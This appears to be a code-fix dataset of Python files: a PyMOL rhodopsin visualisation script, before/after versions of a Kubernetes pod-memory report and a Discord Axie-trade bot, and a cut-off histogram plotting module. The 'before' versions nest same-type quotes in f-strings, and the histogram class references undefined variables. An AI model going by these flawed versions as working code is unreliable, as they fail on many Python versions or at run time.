''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
import colorsimple as cs
from loaddata import load_xlsx
# Specify chains to process...
fl_chain = "chains.comp.xlsx"
lines = load_xlsx(fl_chain)
drc = "pdb"
# Define atoms used for distance matrix analysis...
peptide = ["N", "CA", "C", "O"]
# Specify the range of atoms from rhodopsin...
nterm = 1
cterm = 322
len_peptide = (cterm - nterm + 1) * len(peptide)
# Start pymol
pm = pymolPy3.pymolPy3()
## pm("bg white")
# Get the color palette...
color_items = [ i[4] for i in lines ]
spe = { i : 0 for i in color_items }.keys()
color_dict = cs.color_species(spe, hexsym = '0x')
# Define the transmembrane regions...
TMs = {"TM1" : [ 33, 65],
"ICL1" : [ 66, 69],
"TM2" : [ 70, 100],
"ECL1" : [101, 104],
"TM3" : [105, 140],
"ICL2" : [141, 148],
"TM4" : [149, 173],
"ECL2" : [174, 198],
"TM5" : [199, 226],
"ICL3" : [227, 239],
"TM6" : [240, 277],
"ECL3" : [278, 287],
"TM7" : [288, 307],
"L78" : [308, 309],
"H8" : [310, 322] }
# Choose the select to show colors...
disp_range = [33, 322]
color_clusters = [ str(i) for i in range(disp_range[0],disp_range[1] + 1) ]
# [[[ cluster 1 -- active ]]]
# Go through each structure
custom_clusters = [25, 28, 29, 30, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62,
63, 64, 65, 68, 69, 70, 71, 72, 73]
# Define custom color
custom_color = {
"active" : "0xffa600",
"inactive" : "0x003f5c",
"average" : "0xffd1ff",
}
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_active, ({' or '.join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_active, %cls_active and resi {'+'.join(color_clusters)}")
pm(f"select ret_active, ({' or '.join(entries)}) and resn ret")
pm(f"select hoh_active, ({' or '.join(entries)}) and resn hoh")
pm(f"disable %cls_active")
pm(f"disable %disp_active")
pm(f"disable %ret_active")
pm(f"disable %hoh_active")
# The appearance of TMs in cls_active...
# Cartoon of TMs
pm(f"hide cartoon, %cls_active")
pm(f"set cartoon_color, white, %cls_active")
# Ribbon of TMs
## pm(f"show ribbon, %cls_active")
pm(f"set ribbon_color, white, %cls_active")
# Set the water representation...
pm(f"color {custom_color['active']}, %hoh_active")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color['active']}, %cls_active and resi {'+'.join(color_clusters)}")
pm(f"set cartoon_color, {custom_color['active']}, %cls_active and resi {'+'.join(color_clusters)}")
## pm(f"set stick_color, {custom_color['active']}, %cls_active")
pm(f"cmd.color('{custom_color['active']}', '%cls_active')")
pm(f"util.cnc('%cls_active')")
pm(f"set stick_color, {custom_color['active']}, %ret_active")
# [[[ cluster 2 -- inactive ]]]
custom_clusters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 26, 27, 31, 32, 66, 67]
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_inactive, ({' or '.join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_inactive, %cls_inactive and resi {'+'.join(color_clusters)}")
pm(f"select ret_inactive, ({' or '.join(entries)}) and resn ret")
pm(f"select hoh_inactive, ({' or '.join(entries)}) and resn hoh")
pm(f"disable %cls_inactive")
pm(f"disable %disp_inactive")
pm(f"disable %ret_inactive")
pm(f"disable %hoh_inactive")
pm(f"select cluster_gray, (%cls_active or %cls_inactive) and not (%disp_active or %disp_inactive)")
pm(f"disable %cluster_gray")
# The appearance of cls_inactive
# Cartoon of TMs
pm(f"hide cartoon, %cls_inactive")
pm(f"set cartoon_color, white, %cls_inactive")
# Ribbon of TMs
## pm(f"show ribbon, %cls_inactive")
pm(f"set ribbon_color, white, %cls_inactive")
# Set the water representation...
pm(f"color {custom_color['inactive']}, %hoh_inactive")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color['inactive']}, %cls_inactive and resi {'+'.join(color_clusters)}")
pm(f"set cartoon_color, {custom_color['inactive']}, %cls_inactive and resi {'+'.join(color_clusters)}")
## pm(f"set stick_color, {custom_color['inactive']}, %cls_inactive")
pm(f"cmd.color('{custom_color['inactive']}', '%cls_inactive')")
pm(f"util.cnc('%cls_inactive')")
pm(f"set stick_color, {custom_color['inactive']}, %ret_inactive")
# Customization
## # Set O, N color...
## pm(f"color red, (%cls_active or %cls_inactive) and (name O*)")
## pm(f"color blue, (%cls_active or %cls_inactive) and (name N*)")
# Set view...
pm("set_view (\\")
pm(" 0.719689012, -0.683778822, 0.120294474,\\")
pm(" -0.315132022, -0.167348713, 0.934176385,\\")
pm(" -0.618639231, -0.710220516, -0.335924447,\\")
pm(" -0.000630774, 0.000504352, -155.440078735,\\")
pm(" 56.917179108, 13.737834930, 0.117419243,\\")
pm(" 113.265342712, 197.978042603, -20.000000000 )")
# Resize water sphere scale...
pm(f"set sphere_scale, 0.25, %hoh_active or %hoh_inactive")
# Hide the non-rhodopsin region...
pm(f"hide cartoon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {disp_range[0]}-{disp_range[1]})")
transp = 0
pm("bg white")
pm("set ribbon_color, gray, %cluster_gray")
pm(f"set ribbon_transparency, {transp}")
pm(f"set stick_transparency, {transp}")
# Highlight average structures...
pm("load active.pdb")
pm(f"set cartoon_transparency, {transp}, active")
pm(f"set cartoon_color, {custom_color['active']}, active")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and active")
pm("load inactive.pdb")
pm(f"set cartoon_transparency, {transp}, inactive")
pm(f"set cartoon_color, {custom_color['inactive']}, inactive")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and inactive")
pm("load average.pdb")
pm(f"set cartoon_transparency, {transp}, average")
pm(f"set cartoon_color, {custom_color['average']}, average")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and average")
# Select the transmembrane...
for k, v in TMs.items():
pm(f"select {k}, resi {v[0]}-{v[1]} and (%average or %active or %inactive)")
pm(f"disable {k}")
# Set lighting to rubber...
pm("set ambient, 0.05")
pm("set direct, 0.2")
pm("set spec_direct, 0")
pm("set shininess, 10.")
pm("set reflect, 0.5")
pm("set spec_count, -1")
pm("set spec_reflect, -1.")
pm("set specular, 1")
pm("set specular_intensity, 0.5")
# Try265
pm(f"select his211, resi 211")
pm(f"select glu122, resi 122")
pm(f"show sticks, %his211 or %glu122")
# Highlight environment
pm(f"hide cartoon, average or inactive")
pm(f"hide sticks, average or inactive")
pm(f"set cartoon_transparency, 0.8, active or inactive or average")
pm(f"hide sticks, ret_inactive")
pm(f"hide sticks, cls_inactive")
pm(f"hide everything, hoh_inactive")
pm(f"deselect")
input("Press Enter to exit...")
# 9.63 x 5.30 for output
|
#!/usr/bin/env python3
"""This utility compares pod resource requests and limits against actual usage"""
import subprocess
import argparse
from kubernetes import client, config
from bytes2human import human2bytes, bytes2human
def get_pods(kube, namespace):
"""Return a list of pods in a namespace"""
return kube.list_pod_for_all_namespaces(field_selector='metadata.namespace=%s' % namespace,
include_uninitialized=False,
watch=False)
def get_usage(namespace):
"""Return usage for a namespace, uses heapster"""
return subprocess.run(['kubectl', 'top', 'pod', '--namespace=%s' % namespace],
stdout=subprocess.PIPE).stdout.decode('utf-8')
def formatted_pods(pods):
"""Create a dictionary of pods with their resource information"""
pod_map = {}
for pod in pods.items:
podname = pod.metadata.name
pod_namespace = pod.metadata.namespace
memory_request = 0
memory_limit = 0
for container in pod.spec.containers:
try:
# Convert human readable IEC values to an integer
memory_request += human2bytes(container.resources.requests['memory'])
memory_limit += human2bytes(container.resources.limits['memory'])
except (KeyError, TypeError): # Skip containers without defined requests or limits
pass
pod_map[podname] = {'namespace': pod_namespace,
'resources': {'requests': {'memory': memory_request},
'limits': {'memory': memory_limit}}}
return pod_map
def main(namespace):
"""Compare pod usage to its requests and limits"""
# Load kubernetes config from environment, and connect
config.load_kube_config()
kube = client.CoreV1Api()
# Get a dictionary of pods and their resources
pods = formatted_pods(get_pods(kube, namespace))
# Get pod usage from the namespace
usage = get_usage(namespace)
# Convert multiline usage output, skip the first row which is a header row
for row in usage.splitlines()[1:]:
podname = row.split()[0]
memory_usage = human2bytes(row.split()[2])
pods[podname]['resources']['usage'] = {'memory': memory_usage}
# A namespaces may not exist, and may not contain pods
if not pods:
print('No resources found.')
exit(1)
else:
total_limits = 0
total_requests = 0
total_usage = 0
total_diff = 0
# Print header row
print(f'{'NAME':64} {'MEMORY LIMIT':16} {'MEMORY REQUEST':16} {'MEMORY USED':16} {'DIFFERENCE'}')
# Print details for each pod in the namespace
for pod, state in pods.items():
requests = state['resources']['requests']['memory']
limits = state['resources']['limits']['memory']
try:
usage = state['resources']['usage']['memory']
except KeyError: # Skip non-running pods
usage = 0
# Add it all up
difference = usage - requests
total_limits += limits
total_requests += requests
total_usage += usage
total_diff += difference
# Print pod specific details
print(f'{pod:64} {bytes2human(limits):16} {bytes2human(requests):16} {bytes2human(usage):16} {bytes2human(difference)}')
# Print totals
print(f'{'TOTAL':64} {bytes2human(total_limits):16} {bytes2human(total_requests):16} {bytes2human(total_usage):16} {bytes2human(total_diff)}')
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("namespace", help="Kubernetes namespace.")
ARGS = PARSER.parse_args()
main(ARGS.namespace)
| #!/usr/bin/env python3
"""This utility compares pod resource requests and limits against actual usage"""
import subprocess
import argparse
from kubernetes import client, config
from bytes2human import human2bytes, bytes2human
def get_pods(kube, namespace):
"""Return a list of pods in a namespace"""
return kube.list_pod_for_all_namespaces(field_selector='metadata.namespace=%s' % namespace,
include_uninitialized=False,
watch=False)
def get_usage(namespace):
"""Return usage for a namespace, uses heapster"""
return subprocess.run(['kubectl', 'top', 'pod', '--namespace=%s' % namespace],
stdout=subprocess.PIPE).stdout.decode('utf-8')
def formatted_pods(pods):
"""Create a dictionary of pods with their resource information"""
pod_map = {}
for pod in pods.items:
podname = pod.metadata.name
pod_namespace = pod.metadata.namespace
memory_request = 0
memory_limit = 0
for container in pod.spec.containers:
try:
# Convert human readable IEC values to an integer
memory_request += human2bytes(container.resources.requests['memory'])
memory_limit += human2bytes(container.resources.limits['memory'])
except (KeyError, TypeError): # Skip containers without defined requests or limits
pass
pod_map[podname] = {'namespace': pod_namespace,
'resources': {'requests': {'memory': memory_request},
'limits': {'memory': memory_limit}}}
return pod_map
def main(namespace):
"""Compare pod usage to its requests and limits"""
# Load kubernetes config from environment, and connect
config.load_kube_config()
kube = client.CoreV1Api()
# Get a dictionary of pods and their resources
pods = formatted_pods(get_pods(kube, namespace))
# Get pod usage from the namespace
usage = get_usage(namespace)
# Convert multiline usage output, skip the first row which is a header row
for row in usage.splitlines()[1:]:
podname = row.split()[0]
memory_usage = human2bytes(row.split()[2])
pods[podname]['resources']['usage'] = {'memory': memory_usage}
# A namespaces may not exist, and may not contain pods
if not pods:
print('No resources found.')
exit(1)
else:
total_limits = 0
total_requests = 0
total_usage = 0
total_diff = 0
# Print header row
print(f'{"NAME":64} {"MEMORY LIMIT":16} {"MEMORY REQUEST":16} {"MEMORY USED":16} {"DIFFERENCE"}')
# Print details for each pod in the namespace
for pod, state in pods.items():
requests = state['resources']['requests']['memory']
limits = state['resources']['limits']['memory']
try:
usage = state['resources']['usage']['memory']
except KeyError: # Skip non-running pods
usage = 0
# Add it all up
difference = usage - requests
total_limits += limits
total_requests += requests
total_usage += usage
total_diff += difference
# Print pod specific details
print(f'{pod:64} {bytes2human(limits):16} {bytes2human(requests):16} {bytes2human(usage):16} {bytes2human(difference)}')
# Print totals
print(f'{"TOTAL":64} {bytes2human(total_limits):16} {bytes2human(total_requests):16} {bytes2human(total_usage):16} {bytes2human(total_diff)}')
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("namespace", help="Kubernetes namespace.")
ARGS = PARSER.parse_args()
main(ARGS.namespace)
|
##> Imports
import math
import sys
# > 3rd party dependencies
import pandas as pd
import gspread
import gspread_dataframe as gd
from urllib.request import urlopen
from PIL import Image
from io import BytesIO
# > Discord dependencies
import discord
from discord.ext import commands
from discord.ext.tasks import loop
# > Local dependencies
from alerts.api import api_genes, api_owner_axies
from config import config
# Login using the .json file
gc = gspread.service_account(filename="authentication.json")
class Axie_trades(commands.Cog):
def __init__(self, bot):
self.bot = bot
# This serves as a database, saves: "id", "auction", "class", "breedCount", "parts", "image", "price"
self.axie_db = pd.DataFrame({})
# Start function execution
self.get_axie_auctions.start()
# Could be quicker
@loop(minutes=15)
async def get_axie_auctions(self):
"""Main function that is looped every hour"""
# Save all important data in dataframe
df = pd.DataFrame({})
# Get the address dataframe
address_df = await self.get_addresses()
addresses = address_df["Address"].tolist()
# Do this for every address in the dataframe
for address in addresses:
owned_axies = await self.get_axies(address)
owned_axies["Manager"] = address_df.loc[address_df["Address"] == address][
"Manager"
].tolist()[0]
df = pd.concat([df, owned_axies], ignore_index=True)
# If axie_ids is empty
if self.axie_db.empty:
self.axie_db = df
# Compare
else:
# Get all ids of current axies
new_ids = df["id"].tolist()
old_ids = self.axie_db["id"].tolist()
# Difference: XOR
diff = list(set(new_ids) ^ set(old_ids))
# Sold
if len(new_ids) < len(old_ids):
for id in diff:
await self.send_msg(self.axie_db, id, "sold")
# Buy
elif len(new_ids) > len(old_ids):
for id in diff:
await self.send_msg(df, id, "bought")
# No difference in ids
else:
# Check if price is not NaN
new_auctions = df.loc[~df["price"].isna()]["id"].tolist()
old_auctions = self.axie_db.loc[~self.axie_db["price"].isna()][
"id"
].tolist()
# Difference: XOR
auction_diff = list(set(new_auctions) ^ set(old_auctions))
# New listing!
if len(new_auctions) > len(old_auctions):
for id in auction_diff:
await self.send_msg(df, id, "is selling")
# Update old db
self.axie_db = df
async def send_msg(self, df, id, keyword):
"""Sends a message in the discord channel"""
# Set variables based on id and df
row = df.loc[df["id"] == id]
link = (
"https://marketplace.axieinfinity.com/axie/" + row["id"].tolist()[0] + "/"
)
# Call genes api
genes = await self.get_genes(id)
if not genes.empty:
d = ""
r1 = ""
r2 = ""
r1_title = f"R1 ({genes["r1 deviation"].tolist()[0]})"
r2_title = f"R2 ({genes["r2 deviation"].tolist()[0]})"
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
d += f"{(genes[part].tolist()[0]["d"]["name"])}\n"
r1 += f"{(genes[part].tolist()[0]["r1"]["name"])}\n"
r2 += f"{(genes[part].tolist()[0]["r2"]["name"])}\n"
else:
d = r1 = r2 = "Unknown"
r1_title = "R1"
r2_title = "R2"
# Send message in discord channel
channel = discord.utils.get(
self.bot.get_all_channels(),
guild__name=config["DEBUG"]["GUILD_NAME"]
if len(sys.argv) > 1 and sys.argv[1] == "-test"
else config["DISCORD"]["GUILD_NAME"],
name=config["LOOPS"]["AXIE_TRADES"]["CHANNEL"],
)
# Price
if not math.isnan(row["price"].tolist()[0]):
e = discord.Embed(
title=f"{row["Manager"].tolist()[0]} {keyword} axie named {row["name"].tolist()[0]} for ${str(row["price"].tolist()[0])}",
description="",
url=link,
color=0x00FFFF,
)
else:
e = discord.Embed(
title=f"{row["Manager"].tolist()[0]} {keyword} axie named {row["name"].tolist()[0]}",
description="",
url=link,
color=0x00FFFF,
)
e.set_author(name="Axie Manager", icon_url=self.bot.user.avatar_url)
# Breedcount
e.add_field(
name=":eggplant:",
value=str(round(row["breedCount"].tolist()[0])),
inline=True,
)
e.add_field(name="Class", value=row["class"].tolist()[0], inline=True)
if "stats" in genes.columns:
[
e.add_field(name=stat[1:-5].capitalize(), value=stat[-2:], inline=True)
for stat in str(genes["stats"].tolist()[0])[1:-28].split(", ")
]
e.add_field(name="D", value=d, inline=True)
e.add_field(name=r1_title, value=r1, inline=True)
e.add_field(name=r2_title, value=r2, inline=True)
# Create cropped image for thumbnail
try:
img = Image.open(urlopen(row["image"].tolist()[0]))
width, height = img.size
img_cropped = img.crop((300, 220, width - 300, height - 220))
temp = BytesIO()
img_cropped.save(temp, img.format)
temp.seek(0)
file = discord.File(temp, filename="a.png")
e.set_thumbnail(url="attachment://a.png")
await channel.send(file=file, embed=e)
except Exception:
pass
await channel.send(embed=e)
async def get_genes(self, id):
"""Takes axie id and returns its genes"""
try:
response = await api_genes(id)
except Exception as e:
print(e)
print("Error fetching api_genes")
# Return an empty dataframe, so no crashes will occur
return pd.DataFrame({})
df = pd.DataFrame.from_dict(response, orient="index")
genes = df.transpose()
if genes["stage"].tolist()[0] == 1:
return pd.DataFrame({})
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
genes[part] = genes["traits"].apply(lambda x: x[part])
# Count deviations for every part
for part in ["mouth", "horn", "back", "tail"]:
genes[f"{part} r1"] = [0 if x["d"] == x["r1"] else 1 for x in genes[part]]
genes[f"{part} r2"] = [0 if x["d"] == x["r2"] else 1 for x in genes[part]]
# Sum all the deviations
genes["r1 deviation"] = (
genes["mouth r1"] + genes["horn r1"] + genes["back r1"] + genes["tail r1"]
)
genes["r2 deviation"] = (
genes["mouth r2"] + genes["horn r2"] + genes["back r2"] + genes["tail r2"]
)
return genes
async def get_addresses(self):
"""Gets all Ronin addresses in Scholars spreadsheet"""
# Open Scholars spreadsheet
sheet = gc.open("Scholars")
# Get the Scholars and Funds worksheet as dataframe
scholars = (
gd.get_as_dataframe(sheet.worksheet("Scholars"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
funds = (
gd.get_as_dataframe(sheet.worksheet("Funds"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
# We only care about these columns
scholars = scholars[["Manager", "Address"]]
funds = funds.rename(columns={"Funds Address": "Address"})
# Merge the dataframes
addresses = pd.concat([scholars, funds], ignore_index=True)
# Replace ronin: with 0x for API
addresses["Address"] = addresses["Address"].str.replace("ronin:", "0x")
return addresses
async def get_axies(self, address):
"""
Processes api results and returns the dataframe
"""
try:
df = await api_owner_axies(address)
except Exception:
return pd.DataFrame({})
# Replace parts by their part name, if there are any parts available
if "parts" in df.columns:
df["parts"] = [[d.get("name") for d in x] for x in df["parts"]]
# Save the price in dataframe
if "auction" in df.columns:
df["price"] = pd.to_numeric(
df["auction"].apply(lambda x: x["currentPriceUSD"] if x != None else x)
)
return df
def setup(bot):
bot.add_cog(Axie_trades(bot))
| ##> Imports
import math
import sys
# > 3rd party dependencies
import pandas as pd
import gspread
import gspread_dataframe as gd
from urllib.request import urlopen
from PIL import Image
from io import BytesIO
# > Discord dependencies
import discord
from discord.ext import commands
from discord.ext.tasks import loop
# > Local dependencies
from alerts.api import api_genes, api_owner_axies
from config import config
# Login using the .json file
gc = gspread.service_account(filename="authentication.json")
class Axie_trades(commands.Cog):
def __init__(self, bot):
self.bot = bot
# This serves as a database, saves: "id", "auction", "class", "breedCount", "parts", "image", "price"
self.axie_db = pd.DataFrame({})
# Start function execution
self.get_axie_auctions.start()
# Could be quicker
@loop(minutes=15)
async def get_axie_auctions(self):
"""Main function that is looped every hour"""
# Save all important data in dataframe
df = pd.DataFrame({})
# Get the address dataframe
address_df = await self.get_addresses()
addresses = address_df["Address"].tolist()
# Do this for every address in the dataframe
for address in addresses:
owned_axies = await self.get_axies(address)
owned_axies["Manager"] = address_df.loc[address_df["Address"] == address][
"Manager"
].tolist()[0]
df = pd.concat([df, owned_axies], ignore_index=True)
# If axie_ids is empty
if self.axie_db.empty:
self.axie_db = df
# Compare
else:
# Get all ids of current axies
new_ids = df["id"].tolist()
old_ids = self.axie_db["id"].tolist()
# Difference: XOR
diff = list(set(new_ids) ^ set(old_ids))
# Sold
if len(new_ids) < len(old_ids):
for id in diff:
await self.send_msg(self.axie_db, id, "sold")
# Buy
elif len(new_ids) > len(old_ids):
for id in diff:
await self.send_msg(df, id, "bought")
# No difference in ids
else:
# Check if price is not NaN
new_auctions = df.loc[~df["price"].isna()]["id"].tolist()
old_auctions = self.axie_db.loc[~self.axie_db["price"].isna()][
"id"
].tolist()
# Difference: XOR
auction_diff = list(set(new_auctions) ^ set(old_auctions))
# New listing!
if len(new_auctions) > len(old_auctions):
for id in auction_diff:
await self.send_msg(df, id, "is selling")
# Update old db
self.axie_db = df
async def send_msg(self, df, id, keyword):
"""Sends a message in the discord channel"""
# Set variables based on id and df
row = df.loc[df["id"] == id]
link = (
"https://marketplace.axieinfinity.com/axie/" + row["id"].tolist()[0] + "/"
)
# Call genes api
genes = await self.get_genes(id)
if not genes.empty:
d = ""
r1 = ""
r2 = ""
r1_title = f"R1 ({genes['r1 deviation'].tolist()[0]})"
r2_title = f"R2 ({genes['r2 deviation'].tolist()[0]})"
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
d += f"{(genes[part].tolist()[0]['d']['name'])}\n"
r1 += f"{(genes[part].tolist()[0]['r1']['name'])}\n"
r2 += f"{(genes[part].tolist()[0]['r2']['name'])}\n"
else:
d = r1 = r2 = "Unknown"
r1_title = "R1"
r2_title = "R2"
# Send message in discord channel
channel = discord.utils.get(
self.bot.get_all_channels(),
guild__name=config["DEBUG"]["GUILD_NAME"]
if len(sys.argv) > 1 and sys.argv[1] == "-test"
else config["DISCORD"]["GUILD_NAME"],
name=config["LOOPS"]["AXIE_TRADES"]["CHANNEL"],
)
# Price
if not math.isnan(row["price"].tolist()[0]):
e = discord.Embed(
title=f"{row['Manager'].tolist()[0]} {keyword} axie named {row['name'].tolist()[0]} for ${str(row['price'].tolist()[0])}",
description="",
url=link,
color=0x00FFFF,
)
else:
e = discord.Embed(
title=f"{row['Manager'].tolist()[0]} {keyword} axie named {row['name'].tolist()[0]}",
description="",
url=link,
color=0x00FFFF,
)
e.set_author(name="Axie Manager", icon_url=self.bot.user.avatar_url)
# Breedcount
e.add_field(
name=":eggplant:",
value=str(round(row["breedCount"].tolist()[0])),
inline=True,
)
e.add_field(name="Class", value=row["class"].tolist()[0], inline=True)
if "stats" in genes.columns:
[
e.add_field(name=stat[1:-5].capitalize(), value=stat[-2:], inline=True)
for stat in str(genes["stats"].tolist()[0])[1:-28].split(", ")
]
e.add_field(name="D", value=d, inline=True)
e.add_field(name=r1_title, value=r1, inline=True)
e.add_field(name=r2_title, value=r2, inline=True)
# Create cropped image for thumbnail
try:
img = Image.open(urlopen(row["image"].tolist()[0]))
width, height = img.size
img_cropped = img.crop((300, 220, width - 300, height - 220))
temp = BytesIO()
img_cropped.save(temp, img.format)
temp.seek(0)
file = discord.File(temp, filename="a.png")
e.set_thumbnail(url="attachment://a.png")
await channel.send(file=file, embed=e)
except Exception:
pass
await channel.send(embed=e)
async def get_genes(self, id):
"""Takes axie id and returns its genes"""
try:
response = await api_genes(id)
except Exception as e:
print(e)
print("Error fetching api_genes")
# Return an empty dataframe, so no crashes will occur
return pd.DataFrame({})
df = pd.DataFrame.from_dict(response, orient="index")
genes = df.transpose()
if genes["stage"].tolist()[0] == 1:
return pd.DataFrame({})
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
genes[part] = genes["traits"].apply(lambda x: x[part])
# Count deviations for every part
for part in ["mouth", "horn", "back", "tail"]:
genes[f"{part} r1"] = [0 if x["d"] == x["r1"] else 1 for x in genes[part]]
genes[f"{part} r2"] = [0 if x["d"] == x["r2"] else 1 for x in genes[part]]
# Sum all the deviations
genes["r1 deviation"] = (
genes["mouth r1"] + genes["horn r1"] + genes["back r1"] + genes["tail r1"]
)
genes["r2 deviation"] = (
genes["mouth r2"] + genes["horn r2"] + genes["back r2"] + genes["tail r2"]
)
return genes
async def get_addresses(self):
"""Gets all Ronin addresses in Scholars spreadsheet"""
# Open Scholars spreadsheet
sheet = gc.open("Scholars")
# Get the Scholars and Funds worksheet as dataframe
scholars = (
gd.get_as_dataframe(sheet.worksheet("Scholars"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
funds = (
gd.get_as_dataframe(sheet.worksheet("Funds"))
.dropna(axis=0, how="all")
.dropna(axis=1, how="all")
)
# We only care about these columns
scholars = scholars[["Manager", "Address"]]
funds = funds.rename(columns={"Funds Address": "Address"})
# Merge the dataframes
addresses = pd.concat([scholars, funds], ignore_index=True)
# Replace ronin: with 0x for API
addresses["Address"] = addresses["Address"].str.replace("ronin:", "0x")
return addresses
async def get_axies(self, address):
"""
Processes api results and returns the dataframe
"""
try:
df = await api_owner_axies(address)
except Exception:
return pd.DataFrame({})
# Replace parts by their part name, if there are any parts available
if "parts" in df.columns:
df["parts"] = [[d.get("name") for d in x] for x in df["parts"]]
# Save the price in dataframe
if "auction" in df.columns:
df["price"] = pd.to_numeric(
df["auction"].apply(lambda x: x["currentPriceUSD"] if x != None else x)
)
return df
def setup(bot):
bot.add_cog(Axie_trades(bot))
|
# Advanced histogramming & automated plotting functions
#
# (c) 2021 Mikael Mieskolainen
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
import pathlib
import matplotlib
matplotlib.use('Agg') # Important for multithreaded applications
from matplotlib import pyplot as plt
import numpy as np
import math
import copy
def chi2_cost(h_mc, h_data):
"""
Chi2 cost function between two histograms
"""
counts_mc = h_mc.counts * h_mc.binscale
err_mc = h_mc.errs * h_mc.binscale
counts_data = h_data.counts * h_data.binscale
err_data = h_data.errs * h_data.binscale
return np.sum((counts_mc - counts_data)**2 / (err_mc**2 + err_data**2))
def set_global_style(dpi=120, figsize=(4,3.75), font='serif', font_size=8, legend_fontsize=7, legend_handlelength=1):
""" Set global plot style.
"""
plt.rcParams['legend.fontsize'] = legend_fontsize
plt.rcParams['legend.handlelength'] = legend_handlelength
plt.rcParams['figure.dpi'] = dpi
plt.rcParams['figure.figsize'] = figsize
plt.rcParams['font.family'] = font
plt.rcParams['font.size'] = font_size
# Colors
imperial_dark_blue = (0, 0.24, 0.45)
imperial_light_blue = (0, 0.43, 0.69)
imperial_dark_red = (0.75, 0.10, 0.0)
imperial_green = (0.0, 0.54, 0.23)
def colors(i, power=0.34):
c = [imperial_dark_red, imperial_dark_blue, imperial_green, imperial_light_blue]
if i < len(c):
return c[i]
else:
return c[i%len(c)] * (1.0/power)
""" Global marker styles
zorder : approximate plotting order
lw : linewidth
ls : linestyle
"""
errorbar_style = {'zorder': 3, 'ls': ' ', 'lw': 1, 'marker': 'o', 'markersize': 2.5}
plot_style = {'zorder': 2, 'ls': '-', 'lw': 1}
hist_style_step = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'step'}
hist_style_fill = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'stepfilled'}
hist_style_bar = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'bar'}
class hobj:
""" Minimal histogram data object.
"""
def __init__(self, counts = 0, errs = 0, bins = 0, cbins = 0, binscale=1.0):
self.counts = counts
self.errs = errs
self.bins = bins
self.cbins = cbins
self.binscale = binscale
if (np.sum(counts) == 0):
self.is_empty = True
else:
self.is_empty = False
# + operator
def __add__(self, other):
if (self.is_empty == True): # Take the rhs
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' + operator: cannot operate on different sized histograms')
# Harmonic sum
binscale = 1/(1/self.binscale + 1/other.binscale)
counts = self.counts + other.counts
errs = np.sqrt(self.errs**2 + other.errs**2)
return hobj(counts, errs, bins, cbins, binscale)
# += operator
def __iadd__(self, other):
if (self.is_empty == True): # Still empty
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' += operator: cannot operate on different sized histograms')
self.counts = self.counts + other.counts
self.errs = np.sqrt(self.errs**2 + other.errs**2)
# Harmonic sum
self.binscale = 1/(1/self.binscale + 1/other.binscale)
return self
def stepspace(start, stop, step):
""" Linear binning edges between [start, stop]
"""
return np.arange(start, stop + step, step)
def plot_horizontal_line(ax, color=(0.5,0.5,0.5), linewidth=0.9):
""" For the ratio plot
"""
xlim = ax.get_xlim()
ax.plot(np.linspace(xlim[0], xlim[1], 2), np.array([1,1]), color=color, linewidth=linewidth)
def tick_calc(lim, step, N=6):
""" Tick spacing calculator.
"""
return [np.round(lim[0] + i*step, N) for i in range(1 + math.floor((lim[1] - lim[0])/step))]
def set_axis_ticks(ax, ticks, dim='x'):
""" Set ticks of the axis.
"""
if (dim == 'x'):
ax.set_xticks(ticks)
ax.set_xticklabels(list(map(str, ticks)))
elif (dim == 'y'):
ax.set_yticks(ticks)
ax.set_yticklabels(list(map(str, ticks)))
def tick_creator(ax, xtick_step=None, ytick_step=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, minorticks_on=True, ytick_ratio_step=0.15, labelsize=9,
labelsize_ratio=8, **kwargs) :
""" Axis tick constructor.
"""
# Get limits
xlim = ax[0].get_xlim()
ylim = ax[0].get_ylim()
# X-axis
if (xtick_step is not None):
ticks = tick_calc(lim=xlim, step=xtick_step)
set_axis_ticks(ax[-1], ticks, 'x')
# Y-axis
if (ytick_step is not None):
ticks = tick_calc(lim=ylim, step=ytick_step)
set_axis_ticks(ax[0], ticks, 'y')
# Y-ratio-axis
if ratio_plot:
ax[0].tick_params(labelbottom=False)
ax[1].tick_params(axis='y', labelsize=labelsize_ratio)
